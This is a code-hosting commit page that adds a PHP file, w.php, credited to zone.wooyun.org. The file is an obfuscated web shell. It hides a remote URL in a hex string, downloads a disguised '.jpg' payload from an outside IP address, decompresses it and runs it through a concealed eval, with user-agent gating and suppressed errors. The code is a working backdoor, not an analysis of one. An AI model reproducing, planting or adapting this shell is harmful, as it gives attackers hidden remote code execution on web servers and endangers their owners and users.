Skip to content

Commit 8c50cf3

Browse files
committed
Create w.php
from : zone.wooyun.org
1 parent b09d2ea commit 8c50cf3

File tree

1 file changed

+11
-0
lines changed

1 file changed

+11
-0
lines changed

php/w.php

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
<?php
2+
error_reporting(0);
3+
session_start();
4+
header("Content-type:text/html;charset=gbk");
5+
$password = "d69tjj0sb2dlbq9";
6+
if(empty($_SESSION['api1234']))
7+
$_SESSION['api1234']=file_get_contents(sprintf('%s?%s',pack("H*",'687474703A2F2F3132332E3132352E3131342E38322F6A78666275636B657432303134312F6861636B2F312E6A7067'),uniqid()));
8+
if(stripos($_SERVER['HTTP_USER_AGENT'],'baidu')+0==0) exit;
9+
if(stripos($_SERVER['HTTP_USER_AGENT'],'myccs')+0==0) exit;
10+
($b4dboy = gzuncompress($_SESSION['api1234'])) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
11+
?>

0 commit comments

Comments
 (0)